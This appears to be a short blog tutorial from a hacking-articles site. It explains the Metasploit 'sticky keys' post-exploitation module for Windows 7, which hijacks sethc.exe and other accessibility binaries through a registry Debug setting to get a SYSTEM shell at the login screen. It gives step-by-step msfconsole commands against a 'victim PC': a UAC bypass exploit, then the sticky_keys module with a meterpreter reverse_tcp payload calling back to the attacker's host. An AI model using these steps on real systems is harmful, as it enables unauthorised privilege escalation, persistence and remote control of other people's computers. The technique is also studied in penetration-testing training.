This module makes it possible to apply the ‘sticky keys’ hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting for certain executables. The module options allow for this hack to be applied to: SETHC (sethc.exe is invoked when SHIFT is pressed 5 times), UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U), OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P). The hack can be added using the ADD action, and removed with the REMOVE action. Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded to the target prior to running the module. By default, a SYSTEM command prompt is installed using the registry method if this module is run without modifying any parameters.
Exploit Targets
Windows 7
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)
Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it
use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1
msf exploit (bypassuac_injection)>exploit
Now type use post/windows/manage/sticky_keys
msf exploit (sticky_keys)>set payload windows/meterpreter/reverse_tcp
msf exploit (sticky_keys)>set lhost 192.168.0.121 (IP of Local Host)
msf exploit (sticky_keys)>set session 2
msf exploit (sticky_keys)>exploit
Press shift key 5 times to open cmd prompt
The post Windows 7 Sticky Key Hack Attack using Metasploit appeared first on Hacking Articles.